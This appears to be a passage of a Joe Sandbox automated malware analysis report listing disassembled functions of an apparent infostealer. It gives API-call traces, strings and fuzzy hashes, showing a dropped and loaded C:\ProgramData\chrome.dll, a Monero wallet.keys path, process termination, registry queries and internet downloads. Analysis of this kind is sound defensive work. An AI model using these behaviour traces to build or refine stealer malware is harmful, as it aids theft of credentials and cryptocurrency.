                                        • API String ID: 3073930149-1079375795
                                        • Opcode ID: 0f65e3e0925b8f3120f83c906e38fc35c0b9415f80a15a7327d4ad074ceffa71
                                        • Instruction ID: ee2f553343ba744ed67432924ea77c3c11579a01bfb50733dd1e615a28c4b5ee
                                        • Opcode Fuzzy Hash: 0f65e3e0925b8f3120f83c906e38fc35c0b9415f80a15a7327d4ad074ceffa71
                                        • Instruction Fuzzy Hash: B6B130B191010C9BCB14FBA1CCA6EFE7739AF54305F40455EF60A63191EF386A58CB6A
                                        Function 004F6A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess$DefaultLangUser
                                        • String ID: *
                                        • API String ID: 1494266314-163128923
                                        • Opcode ID: cef06b57a03bec826d590fce3b3b3ad269fcaeed5b971d2de0b2e77c1cacbff3
                                        • Instruction ID: 8d9969cf622e33cc55135dee9bc213d913e07ed5c490057bdf33b83162f6a37b
                                        • Opcode Fuzzy Hash: cef06b57a03bec826d590fce3b3b3ad269fcaeed5b971d2de0b2e77c1cacbff3
                                        • Instruction Fuzzy Hash: DFF05430D0C20DEFD3489FE4E809B6C7B30EB85707F1182A5F719AA290C6784A50DB69
                                        Function 004F08A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004F9850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,004F08DC,C:\ProgramData\chrome.dll), ref: 004F9871
                                          • Part of subcall function 004EA090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 004EA098
                                        • StrCmpCA.SHLWAPI(00000000,01458E60), ref: 004F0922
                                        • StrCmpCA.SHLWAPI(00000000,01458F50), ref: 004F0B79
                                        • StrCmpCA.SHLWAPI(00000000,01458F80), ref: 004F0A0C
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                        • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 004F0C35
                                        Strings
                                        • C:\ProgramData\chrome.dll, xrefs: 004F0C30
                                        • C:\ProgramData\chrome.dll, xrefs: 004F08CD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                        • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                        • API String ID: 585553867-663540502
                                        • Opcode ID: 88cfa349fd91cf52b430171c6d73b40d1da59069a3fe8d10d4f82837cd1afcf5
                                        • Instruction ID: dfd876c4b7c9c9c9a29b63ed5f5361d52b61ec5349f5689ea22068199024a634
                                        • Opcode Fuzzy Hash: 88cfa349fd91cf52b430171c6d73b40d1da59069a3fe8d10d4f82837cd1afcf5
                                        • Instruction Fuzzy Hash: 2BA18571B002489FCB18EF65C996EBD7776FF94304F10812DE50A4F292DA349A19CB96
                                        Function 004E9E30 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 163stringsleepCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004F8CF0: GetSystemTime.KERNEL32(00500E1B,0145A610,005005B6,?,?,004E13F9,?,0000001A,00500E1B,00000000,?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004F8D16
                                        • wsprintfA.USER32 ref: 004E9E7F
                                        • lstrcat.KERNEL32(00000000,?), ref: 004E9F03
                                        • lstrcat.KERNEL32(00000000,?), ref: 004E9F17
                                        • lstrcat.KERNEL32(00000000,005012D8), ref: 004E9F29
                                        • lstrcpy.KERNEL32(?,00000000), ref: 004E9F7C
                                        • Sleep.KERNEL32(00001388), ref: 004EA013
                                          • Part of subcall function 004F99A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004F99C5
                                          • Part of subcall function 004F99A0: Process32First.KERNEL32(004EA056,00000128), ref: 004F99D9
                                          • Part of subcall function 004F99A0: Process32Next.KERNEL32(004EA056,00000128), ref: 004F99F2
                                          • Part of subcall function 004F99A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004F9A4E
                                          • Part of subcall function 004F99A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 004F9A6C
                                          • Part of subcall function 004F99A0: CloseHandle.KERNEL32(00000000), ref: 004F9A79
                                          • Part of subcall function 004F99A0: CloseHandle.KERNEL32(004EA056), ref: 004F9A88
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                        • String ID: D
                                        • API String ID: 531068710-2746444292
                                        • Opcode ID: 81172c982a60a89358a7870f341ebb18b36df4a2e528a8966648000a87a88dbc
                                        • Instruction ID: c62d7c2de93ef970b2a693bb89a544f9709f179ded5011415fbcdf0e5d2afd13
                                        • Opcode Fuzzy Hash: 81172c982a60a89358a7870f341ebb18b36df4a2e528a8966648000a87a88dbc
                                        • Instruction Fuzzy Hash: 5C51A7B1944308ABEB24DB60DC4AFEE7378AF44704F004599B60DAB2C1EB75AB84CF55
                                        Function 0055F9E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                        Download Yara Rule
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 0055FA1F
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0055FA27
                                        • _ValidateLocalCookies.LIBCMT ref: 0055FAB0
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0055FADB
                                        • _ValidateLocalCookies.LIBCMT ref: 0055FB30
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                        • Instruction ID: 490e1f6ac4c341fd594cd3a1e3897250411e381b6df1b7f944983307050f72f0
                                        • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                        • Instruction Fuzzy Hash: FB419330900219EBCF10DF68C894A9EBFB5BF49325F148166ED19AB391D7319E09CB91
                                        Function 004E5000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004E501A
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004E5021
                                        • InternetOpenA.WININET(00500DE3,00000000,00000000,00000000,00000000), ref: 004E503A
                                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 004E5061
                                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 004E5091
                                        • InternetCloseHandle.WININET(?), ref: 004E5109
                                        • InternetCloseHandle.WININET(?), ref: 004E5116
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                        • String ID:
                                        • API String ID: 3066467675-0
                                        • Opcode ID: cf301260655e45da14550d75d62f321f93da5a9240030bedfecf9ad5e501e6e3
                                        • Instruction ID: a87bbb7918ac0104296cecb5e15fb2205b294796d5bf9a953a93387249cca3df
                                        • Opcode Fuzzy Hash: cf301260655e45da14550d75d62f321f93da5a9240030bedfecf9ad5e501e6e3
                                        • Instruction Fuzzy Hash: DD31F5B4A0421CABDB24CF54CC85BDDB7B4AB88304F1081D9FA09A7281C7746AC58FAD
                                        Function 004F856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004F85B6
                                        • wsprintfA.USER32 ref: 004F85E9
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 004F860B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 004F861C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 004F8629
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                        • RegQueryValueExA.ADVAPI32(00000000,0145E070,00000000,000F003F,?,00000400), ref: 004F867C
                                        • lstrlen.KERNEL32(?), ref: 004F8691
                                        • RegQueryValueExA.ADVAPI32(00000000,0145DF98,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00500B3C), ref: 004F8729
                                        • RegCloseKey.ADVAPI32(00000000), ref: 004F8798
                                        • RegCloseKey.ADVAPI32(00000000), ref: 004F87AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 3896182533-4073750446
                                        • Opcode ID: 2d0777d3f1addcc37eb18c16d9f512861a1275860e205536c58200546b46b8ce
                                        • Instruction ID: d2da06ef8618731cf16fce5d0e767fce3d708a6b91a4bf8edeef325e14d768ee
                                        • Opcode Fuzzy Hash: 2d0777d3f1addcc37eb18c16d9f512861a1275860e205536c58200546b46b8ce
                                        • Instruction Fuzzy Hash: EF21EB7191421C9BDB24DB54DC85FE9B3B8FB88704F10C1D9A609A6180DF756A85CFE8
                                        Function 004F99A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004F99C5
                                        • Process32First.KERNEL32(004EA056,00000128), ref: 004F99D9
                                        • Process32Next.KERNEL32(004EA056,00000128), ref: 004F99F2
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004F9A4E
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 004F9A6C
                                        • CloseHandle.KERNEL32(00000000), ref: 004F9A79
                                        • CloseHandle.KERNEL32(004EA056), ref: 004F9A88
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                        • String ID:
                                        • API String ID: 2696918072-0
                                        • Opcode ID: 20a72dee9dab43a6c49c82866c4a30c04900dbb7bfe707a8abb86b2f92163fc6
                                        • Instruction ID: 33fb465b89c3477154a6ac3a9f970413d87ab2e756a5396dd5081540552595c3
                                        • Opcode Fuzzy Hash: 20a72dee9dab43a6c49c82866c4a30c04900dbb7bfe707a8abb86b2f92163fc6
                                        • Instruction Fuzzy Hash: 4221ED7190421CABDB25DF65DC89BEEB7B9BB88300F1081C9E609A6290D7789E84CF54
                                        Function 004F7820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F7834
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F783B
                                        • RegOpenKeyExA.ADVAPI32(80000002,0144C150,00000000,00020119,00000000), ref: 004F786D
                                        • RegQueryValueExA.ADVAPI32(00000000,0145E088,00000000,00000000,?,000000FF), ref: 004F788E
                                        • RegCloseKey.ADVAPI32(00000000), ref: 004F7898
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: Windows 11
                                        • API String ID: 3225020163-2517555085
                                        • Opcode ID: 592c3d4abf192b03d5c22c774089b351e1042b487ce017ae4a55f58a31225b51
                                        • Instruction ID: 1559809db0e1f2997f52bbf6469a647b82cdabdf4fee30dae11ffad8bc3111af
                                        • Opcode Fuzzy Hash: 592c3d4abf192b03d5c22c774089b351e1042b487ce017ae4a55f58a31225b51
                                        • Instruction Fuzzy Hash: 7B01F475A44309BBEB04DBE4DD49FAE7778EB88700F108155F705A7291D67C9900CB69
                                        Function 004F78B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F78C4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F78CB
                                        • RegOpenKeyExA.ADVAPI32(80000002,0144C150,00000000,00020119,004F7849), ref: 004F78EB
                                        • RegQueryValueExA.ADVAPI32(004F7849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 004F790A
                                        • RegCloseKey.ADVAPI32(004F7849), ref: 004F7914
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: CurrentBuildNumber
                                        • API String ID: 3225020163-1022791448
